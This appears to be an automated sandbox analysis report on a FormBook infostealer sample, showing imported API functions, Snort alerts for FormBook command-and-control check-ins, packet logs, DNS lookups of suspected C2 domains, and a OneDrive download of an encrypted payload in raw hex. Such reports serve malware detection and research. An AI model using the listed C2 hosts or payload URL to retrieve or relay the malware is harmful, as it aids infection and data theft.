                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey, IsValidSid
                                                                                              kernel32.dllSleep
                                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                              comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                              comdlg32.dllGetOpenFileNameA
                                                                                              URLAutodialHookCallback

                                                                                              Possible Origin

                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              192.168.2.5217.160.0.9549719802031453 11/29/22-18:26:33.912103TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.5217.160.0.95
                                                                                              192.168.2.5192.0.78.14149715802031453 11/29/22-18:26:08.582417TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.5192.0.78.141
                                                                                              192.168.2.5217.160.0.9549719802031412 11/29/22-18:26:33.912103TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.5217.160.0.95
                                                                                              192.168.2.552.85.92.8449717802031453 11/29/22-18:26:23.800962TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.552.85.92.84
                                                                                              192.168.2.5217.160.0.9549719802031449 11/29/22-18:26:33.912103TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.5217.160.0.95
                                                                                              192.168.2.5192.0.78.14149715802031449 11/29/22-18:26:08.582417TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.5192.0.78.141
                                                                                              192.168.2.552.85.92.8449717802031412 11/29/22-18:26:23.800962TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.552.85.92.84
                                                                                              192.168.2.5192.0.78.14149715802031412 11/29/22-18:26:08.582417TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.5192.0.78.141
                                                                                              192.168.2.552.85.92.8449717802031449 11/29/22-18:26:23.800962TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.552.85.92.84

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 29, 2022 18:24:02.150501013 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.150546074 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.150648117 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.152163029 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.152179956 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.254343033 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.254555941 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.255497932 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.255589962 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.267853975 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.267887115 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.268393040 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.268481970 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.269418001 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.269438982 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.500678062 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.500714064 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.500811100 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.500822067 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.500838041 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.500870943 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.500896931 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.500904083 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.500924110 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.500952005 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.500967026 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.500974894 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.501029968 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.526240110 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.526367903 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.526443005 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.526479006 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.526498079 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.526504993 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.526525021 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.526536942 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.526561975 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.526582003 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.526590109 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.526628017 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.526633024 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.526657104 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.526691914 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.526717901 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.526727915 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.526765108 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.526782990 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.526839972 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.526849031 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.526925087 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.554421902 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.554553032 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.554594040 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.554619074 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.554632902 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.554657936 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.554661036 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.554682970 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.554713964 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.554738998 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.554744959 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.554785967 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.554790974 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.554811954 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.554847002 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.554872990 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.554893017 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.554939032 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.554979086 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.555042028 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.555049896 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.555092096 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.555105925 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.555126905 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.555171967 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.555187941 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.555192947 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.555222988 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.555227995 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.555243969 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.555279016 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.555296898 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.555304050 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.555342913 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.555367947 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.555430889 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.555437088 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.555522919 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.577827930 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.578022003 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.578116894 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.578166008 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.578205109 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.578243017 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.578641891 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.578684092 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.578753948 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.578780890 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.578811884 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.578839064 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.579016924 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.579112053 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.579122066 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.579166889 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.579243898 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.579273939 CET4434970813.107.43.12192.168.2.5
                                                                                              Nov 29, 2022 18:24:02.579360008 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.583518028 CET49708443192.168.2.513.107.43.12
                                                                                              Nov 29, 2022 18:24:02.583559036 CET4434970813.107.43.12192.168.2.5

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 29, 2022 18:24:01.159205914 CET4972453192.168.2.58.8.8.8
                                                                                              Nov 29, 2022 18:24:02.097614050 CET6145253192.168.2.58.8.8.8
                                                                                              Nov 29, 2022 18:26:08.541414976 CET5922053192.168.2.58.8.8.8
                                                                                              Nov 29, 2022 18:26:08.563268900 CET53592208.8.8.8192.168.2.5
                                                                                              Nov 29, 2022 18:26:13.612112999 CET5506853192.168.2.58.8.8.8
                                                                                              Nov 29, 2022 18:26:13.632412910 CET53550688.8.8.8192.168.2.5
                                                                                              Nov 29, 2022 18:26:18.722286940 CET5668253192.168.2.58.8.8.8
                                                                                              Nov 29, 2022 18:26:18.742017984 CET53566828.8.8.8192.168.2.5
                                                                                              Nov 29, 2022 18:26:23.756469965 CET5853253192.168.2.58.8.8.8
                                                                                              Nov 29, 2022 18:26:23.777184010 CET53585328.8.8.8192.168.2.5
                                                                                              Nov 29, 2022 18:26:28.831734896 CET6265953192.168.2.58.8.8.8
                                                                                              Nov 29, 2022 18:26:28.853539944 CET53626598.8.8.8192.168.2.5
                                                                                              Nov 29, 2022 18:26:33.864237070 CET5626353192.168.2.58.8.8.8
                                                                                              Nov 29, 2022 18:26:33.889528990 CET53562638.8.8.8192.168.2.5

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Nov 29, 2022 18:24:01.159205914 CET192.168.2.58.8.8.80x3277Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:24:02.097614050 CET192.168.2.58.8.8.80xb4c2Standard query (0)ppqfqw.ph.files.1drv.comA (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:08.541414976 CET192.168.2.58.8.8.80xcc02Standard query (0)www.librairie-adrienne.comA (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:13.612112999 CET192.168.2.58.8.8.80x953aStandard query (0)www.rematedeldia.comA (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:18.722286940 CET192.168.2.58.8.8.80xb26aStandard query (0)www.thecuratedpour.comA (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:23.756469965 CET192.168.2.58.8.8.80x5846Standard query (0)www.customapronsnow.comA (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:28.831734896 CET192.168.2.58.8.8.80xae1Standard query (0)www.segurofunerarioar.comA (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:33.864237070 CET192.168.2.58.8.8.80x5457Standard query (0)www.kuechenpruefer.comA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Nov 29, 2022 18:24:01.202867985 CET8.8.8.8192.168.2.50x3277No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Nov 29, 2022 18:24:02.146754980 CET8.8.8.8192.168.2.50xb4c2No error (0)ppqfqw.ph.files.1drv.comph-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Nov 29, 2022 18:24:02.146754980 CET8.8.8.8192.168.2.50xb4c2No error (0)ph-files.fe.1drv.comodc-ph-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Nov 29, 2022 18:24:02.146754980 CET8.8.8.8192.168.2.50xb4c2No error (0)l-0003.l-dc-msedge.net13.107.43.12A (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:08.563268900 CET8.8.8.8192.168.2.50xcc02No error (0)www.librairie-adrienne.comlibrairie-adrienne.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:08.563268900 CET8.8.8.8192.168.2.50xcc02No error (0)librairie-adrienne.com192.0.78.141A (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:08.563268900 CET8.8.8.8192.168.2.50xcc02No error (0)librairie-adrienne.com192.0.78.240A (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:13.632412910 CET8.8.8.8192.168.2.50x953aNo error (0)www.rematedeldia.comcompralo1234.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:13.632412910 CET8.8.8.8192.168.2.50x953aNo error (0)compralo1234.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:13.632412910 CET8.8.8.8192.168.2.50x953aNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:18.742017984 CET8.8.8.8192.168.2.50xb26aName error (3)www.thecuratedpour.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:23.777184010 CET8.8.8.8192.168.2.50x5846No error (0)www.customapronsnow.com52.85.92.84A (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:23.777184010 CET8.8.8.8192.168.2.50x5846No error (0)www.customapronsnow.com52.85.92.99A (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:23.777184010 CET8.8.8.8192.168.2.50x5846No error (0)www.customapronsnow.com52.85.92.94A (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:23.777184010 CET8.8.8.8192.168.2.50x5846No error (0)www.customapronsnow.com52.85.92.122A (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:28.853539944 CET8.8.8.8192.168.2.50xae1Name error (3)www.segurofunerarioar.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Nov 29, 2022 18:26:33.889528990 CET8.8.8.8192.168.2.50x5457No error (0)www.kuechenpruefer.com217.160.0.95A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • ppqfqw.ph.files.1drv.com

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.54970813.107.43.12443C:\Users\user\Desktop\0321423605241625.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-11-29 17:24:02 UTC0OUTGET /y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3rlGujQmh2dpM-9vT8IEOnYjevggDBPg3L6krVTX5rpZ6Y9fWqq7mXN8HP0HSdlr6-fMy35G8DvzJqxvSasnXVIJpB-5dNG-tdgdNk_U_XYoTZ1ccJrC1sgInwIFqmsOi4T1bkt9-CIDRF_pvQqcEQA/Mwqrxeuzvim?download&psid=1 HTTP/1.1
                                                                                              User-Agent: 92
                                                                                              Host: ppqfqw.ph.files.1drv.com
                                                                                              Connection: Keep-Alive
                                                                                              2022-11-29 17:24:02 UTC0INHTTP/1.1 200 OK
                                                                                              Cache-Control: public
                                                                                              Content-Length: 167894
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Location: https://ppqfqw.ph.files.1drv.com/y4mcSg4TVpIg-eA6Y1ciUp4Dzz62AcO4SwOj-306Rp8dovP_vJs6bBF8upLxcpz7eVdZGSx9Ol9ClEvWsBTGhGhDp1lOphmbBYAZeeG6kBcbNfX63XppGpQ9Lnf4aLFJrvafSJ-CRf7GOc_jYykk5VSi-hMNFrupox4BDhefW1nK17aA0ESQkVwL_6Hp36kpUg7
                                                                                              Expires: Mon, 27 Feb 2023 17:24:02 GMT
                                                                                              Last-Modified: Tue, 29 Nov 2022 05:23:43 GMT
                                                                                              Accept-Ranges: bytes
                                                                                              ETag: E0CF7F9E6AAF27EF!846.2
                                                                                              P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                              X-MSNSERVER: PH2PPF3096F872A
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              MS-CV: gEDtYfW2Y0yf4BLo6q8l4Q.0
                                                                                              X-SqlDataOrigin: S
                                                                                              CTag: aYzpFMENGN0Y5RTZBQUYyN0VGITg0Ni4yNTc
                                                                                              X-PreAuthInfo: rv;poba;
                                                                                              Content-Disposition: attachment; filename="Mwqrxeuzvim"
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-StreamOrigin: X
                                                                                              X-AsmVersion: UNKNOWN; 19.1047.1109.2003
                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                              X-MSEdge-Ref: Ref A: E56A57C8A57240D88FB130D3F214E3FF Ref B: VIEEDGE2305 Ref C: 2022-11-29T17:24:02Z
                                                                                              Date: Tue, 29 Nov 2022 17:24:02 GMT
                                                                                              Connection: close
                                                                                              2022-11-29 17:24:02 UTC1INData Raw: 1e 1c 93 8f 34 9f 65 ea 8b 34 8d b1 6b 6b ea 34 8d 18 8f f4 1a 1e 1c 93 6b 6b 8d 34 18 8d 9f a1 18 8d 8b 34 71 77 79 6d fe 08 08 02 0a 71 77 7f 7d 81 6d 83 6d fe 10 7b 81 7d 7f 0c f8 6f 06 75 fa fc 0a 00 85 81 6d 77 f8 7f 6d 0e fe 6d 77 02 fc 10 81 10 0c 02 02 10 f8 fe 00 77 02 7f 10 75 81 10 08 fc 00 83 06 77 7b 77 73 85 0e 77 6d 7b 6d 02 02 7b 75 6f fe 7d 6d 10 71 10 71 85 0a 83 85 73 1e 1c 93 8f 34 9f 65 ea 8b 34 8d b1 6b 6b ea 34 8d 18 8f f4 1a 1e 1c 93 6b 6b 8d 34 18 8d 9f a1 18 8d 8b 34 b7 83 7d 08 0e 71 81 10 0c 75 79 1e 1c 93 8f 34 9f 65 ea 8b 34 8d b1 6b 6b ea 34 8d 18 8f f4 1a 1e 1c 93 6b 6b 8d 34 18 8d 9f a1 18 8d 8b 34 c3 c1 bb c7 4a 64 64 46 5e c3 c1 d9 d7 d3 c7 d5 c7 4a 5c bd d3 d7 d9 60 54 c9 62 bf 4e 50 5e 4c cf d3 c7 c1 54 d9 c7 5a 4a c7
                                                                                              Data Ascii: 4e4kk4kk44qwymqw}mm{}oumwmmwwuw{wswm{m{uo}mqqs4e4kk4kk44}quy4e4kk4kk44JddF^J\`TbNP^LTZJ
                                                                                              2022-11-29 17:24:02 UTC3INData Raw: 35 28 d6 49 4e ac 80 9d 0f a7 62 75 9c f8 26 79 30 4d aa 99 7d 50 1d c7 f2 48 94 94 51 6c 0a e8 8b d5 cf 44 d9 51 56 11 3c 30 8c e3 d9 19 a4 9b 19 88 a8 38 28 d6 42 f9 1e 30 75 7e 15 19 1d 37 83 c9 3a e1 d8 d3 c5 6d ce a1 38 ad c1 98 d9 1c 17 f0 6b 19 f3 14 2a ba 99 4f bb 81 15 a5 f5 c8 67 1a d8 ac c0 f6 f7 bf d1 4f 30 99 c5 49 97 31 88 b1 42 39 2e f3 3d 56 61 6f c1 74 d4 73 9b f1 1b 7e 49 10 91 d6 c0 f3 c5 d4 11 32 97 1c 4b e0 54 db 09 b9 e2 1d 0f ef 14 77 72 cb 6b bf e0 15 b3 2d 9c 85 33 f7 ec c9 53 9b a5 fd e3 d4 6b ac db b8 c9 1f 21 d7 2e 38 d9 69 af 3a 9b 09 1e bd 0a 8a f0 19 3e 1e 58 ce 46 8a 85 64 c1 94 aa 0c 89 3a 57 89 7c f5 98 b6 29 52 c2 c4 38 2a a4 b3 47 6e 0c d9 0b 58 15 be b7 e6 f0 1e 85 83 cc e3 6f 64 8a 19 3f 84 50 d8 4d 83 b6 4d fb 8c 61
                                                                                              Data Ascii: 5(INbu&y0M}PHQlDQV<08(B0u~7:m8k*OgO0I1B9.=Vaots~I2KTwrk-3Sk!.8i:>XFd:W|)R8*GnXod?PMMa
                                                                                              2022-11-29 17:24:02 UTC11INData Raw: fa b0 0c a8 25 9f 5c 1f 98 e8 16 22 84 7f e4 b9 c0 9f f3 59 70 80 66 e0 46 fc 59 9d 4b 25 29 9e 2d 28 fa ba 30 97 f2 d9 a3 64 50 7a 09 6a a2 35 fa 27 ed 73 ae 35 9c 6b b8 6c d6 1b 74 83 1d df c0 64 af b9 a9 fb 05 a8 d0 a5 4b 11 db ea 3b c2 88 1a 98 78 b6 0d 5a dc a2 55 d8 fe 3f 0b 5c 1f bf 86 2c 34 9c 3d 32 37 24 b1 71 ce 96 7d 11 05 82 5c d4 7b cf 59 0c 55 ad d9 03 eb 28 2f 5c 1b 74 2c 0c 02 8a 67 13 b8 f2 0c c2 41 97 62 51 c5 3c c9 e8 dd 37 ca 46 3b 10 a0 56 9d e0 45 99 97 7b 29 e7 a1 09 0b 97 83 7b a1 ee 6c 4b 50 08 30 7d 04 f8 e3 7b 28 b8 50 4f ff 77 41 ea dc 24 c2 9f 45 25 88 d4 ad 1f c6 6c 61 5d 47 43 23 5d a1 63 e1 45 67 e0 71 af 1b 9e 35 31 63 9f 29 81 f4 71 b1 93 84 98 e5 9b 9b e8 16 d1 56 b1 3c 01 66 53 09 7f 89 d7 18 8c 77 7d 02 10 ad 1d 94 2b
                                                                                              Data Ascii: %\"YpfFYK%)-(0dPzj5's5kltdK;xZU?\,4=27$q}\{YU(/\t,gAbQ<7F;VE{){lKP0}{(POwA$E%la]GC#]cEgq51c)qV<fSw}+
                                                                                              2022-11-29 17:24:02 UTC19INData Raw: 5e de ad 16 a4 e0 fa 80 1d f5 34 eb 3a 40 16 d4 c0 76 7d 52 3a 96 71 34 2f c9 85 60 53 5d db ec 70 aa 8d bc 4b 18 04 14 ad 6a d7 d6 7a e7 09 48 21 e5 77 44 32 13 cb d0 5b bb 69 9c 19 f2 90 0b 78 c6 19 39 70 32 e2 1f 2f 35 d7 71 10 29 58 c8 2b 5b 26 c9 05 5e 9c ab 7c 24 94 fa d2 b1 ec 56 c9 0e 4c 2a fd a2 54 24 82 7e 95 10 8a 50 3c d3 af 6e 5c 9d c2 8f 66 85 69 d7 e4 49 ba 02 ba b8 3c 49 bb 55 ca 30 52 c9 54 21 e4 92 cc 5e ce 34 5e 57 7b d2 b3 30 80 e3 c2 18 77 ce 13 86 5a 26 5d 73 73 a6 94 db 71 8c 0c 4b 7c 0e 6e fb 6d 57 1e 6d 1d d1 ae c2 67 34 5c ef a2 fb 9b dd f0 0e e3 f3 32 81 84 6f fa 14 47 f1 c6 95 24 ea 27 bf 17 ac a2 29 8d b3 35 10 56 7d 4d 85 78 58 47 84 0e 79 86 70 3d 5e 08 2b a8 01 32 fa b1 7f 39 fa 0b 21 a9 b7 44 d8 c6 d8 81 32 e0 04 0a 4b c9
                                                                                              Data Ascii: ^4:@v}R:q4/`S]pKjzH!wD2[ix9p2/5q)X+[&^|$VL*T$~P<n\fiI<IU0RT!^4^W{0wZ&]ssqK|nmWmg4\2oG$')5V}MxXGyp=^+29!D2K
                                                                                              2022-11-29 17:24:02 UTC27INData Raw: d1 f5 12 20 b1 25 1f d6 eb 93 bc 3e d0 5e 5c 28 c9 c2 ad 11 9e 5c 30 71 35 bc d7 bb d1 47 43 2a 8b ba 5c b0 bc 5a d1 c3 63 76 62 8b 3d b6 9f ca 80 e0 cc c7 4a f7 41 c1 d0 32 b7 e1 4c f3 53 80 99 d8 f7 b8 dd cd c7 61 0e ee 11 78 aa 56 7a a4 8c a7 7f 65 c8 a5 f2 9d c4 9f e7 ed 38 06 a0 9d 36 ab b5 9f bc f3 c1 93 75 a9 be b7 4d ba a7 23 48 ca 42 bb f1 cf 88 11 fc f7 3e 26 77 1f ae 6b 5f a8 8a d5 5c 88 28 69 89 77 be a3 b2 7f 6e a0 bf ed ab 59 b1 2c 69 ef 11 3c f4 c8 92 ab ea 4d a6 b8 cb ed a5 2b ea 0a 4b c6 5d 2a 3c e5 e5 e7 31 40 d0 3a e1 af 97 da 9f eb b8 c0 f7 35 fb 46 be 1b 93 b9 04 1d 17 14 e5 4a f2 7a 4e 8e 31 6c 7b 45 5f 72 cc e9 f4 8b 97 39 f8 ea 0e 71 51 26 de 7f 9f ba 26 b0 4a 35 65 14 a4 c0 fe 22 70 13 d4 71 66 f7 f6 c8 18 58 38 cc 9d ba 76 6f 2f
                                                                                              Data Ascii: %>^\(\0q5GC*\Zcvb=JA2LSaxVze86uM#HB>&wk_\(iwnY,i<M+K]*<1@:5FJzN1l{E_r9qQ&&J5e"pqfX8vo/
